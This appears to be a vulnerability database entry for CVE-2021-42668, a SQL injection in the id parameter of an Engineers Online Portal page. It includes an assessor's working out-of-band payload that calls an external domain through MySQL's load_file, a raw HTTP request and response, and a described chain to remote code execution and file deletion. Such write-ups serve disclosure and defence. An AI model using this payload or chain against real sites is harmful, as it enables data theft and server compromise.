Very High
CVE-2021-42668
CVE-2021-42668
Description
A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page.. As a result, an attacker can extract sensitive data from the web server and in some cases can use this vulnerability in order to get a remote code execution on the remote web server.
Add Assessment
Technical Analysis
CVE-2021-42668
Vendor
Description
The id from my_classmates.php in Engineers Online Portal 1.0 parameter appears to be vulnerable to SQL injection and RCE attacks.
The payload ‘+(select load_file(’\\n0o5m5xdxay49mw826umfj1wsnygm9ix90xrkh86.nu11secur1tyPenetrationTestingEngineer.net\sch’))+’ was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can bypass the admin account and he can upload a malicious code by using the avatar vulnerability function with directory traversal method,
then he can execute this malicious code. For this example, the attacker destroys all files in the current directory.
STATUS Hiper Critical and Awful.
CONCLUSION: This pseudo developer must be stopped immediately.
MySQL Request:
GET /nia_munoz_monitoring_system/my_classmates.php?id=189' HTTP/1.1 Host: 192.168.1.2 Cookie: PHPSESSID=k6gnppcljj6b7vs8ua3tdefmkt Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.2/nia_munoz_monitoring_system/dashboard_student.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Connection: close Cache-Control: max-age=0
MySQL Response:
HTTP/1.1 200 OK Date: Fri, 03 Dec 2021 17:54:59 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 5946 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html class="no-js"> <head> <title>NIA Project Monitoring System</title> <meta name="description" content="Learning Management System"> <meta name="keywords" conte ...[SNIP]... <ul id="da-thumbs" class="da-thumbs"> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''189'' order by lastname' at line 4
Reproduce:
Proof and Exploit:
M0r3:
Proof and Explot:
CVSS V3 Severity and Metrics
General Information
Vendors
- engineers online portal project
Products
- engineers online portal -
References
